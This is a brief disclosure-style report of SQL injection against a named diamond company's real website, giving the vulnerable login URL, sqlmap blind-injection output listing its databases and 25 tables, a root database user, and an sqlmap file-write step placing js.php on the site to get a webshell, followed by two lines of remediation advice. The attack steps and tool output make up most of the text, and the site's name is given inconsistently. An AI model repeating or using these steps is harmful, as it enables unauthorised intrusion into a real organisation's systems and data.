There is SQL Injection on the kibablendiamond official website.

There is SQL Injection on the kibablendiamond official website.

The official website of Kimberly Diamond has SQL injection to get webshell.

Sqlmap blind Injection

Logon page
 

http://www.kimberlite.com.cn/index.php?r=site/flogin

Injected Database
 

web application technology: PHP 5.6.15, Nginxback-end DBMS: MySQL 5.0.11available databases [6]:[*] information_schema[*] kella[*] kimberlite[*] mysql[*] performance_schema[*] test

Inject the kimberlite table
 

Database: kimberlite[25 tables]+------------------+| join             || user             || application      || brand            || caption          || classic          || classic_list     || config           || desginer         || desginer_list    || huodong          || images           || jiamengshang     || jm               || kd_list          || member           || new_push         || news             || picture          || product          || product_categroy || product_type     || source           || story_video      || zuanshi          |+------------------+

View User Permissions
 

current user:    'root@%'

Permission to write files
 

--file-write http://www.kimberlite.com.cn/assets/197aed28/js.php

Obtain webshell
 

 

Solution:

1. Minimize User Permissions

2. Use precompiled statements.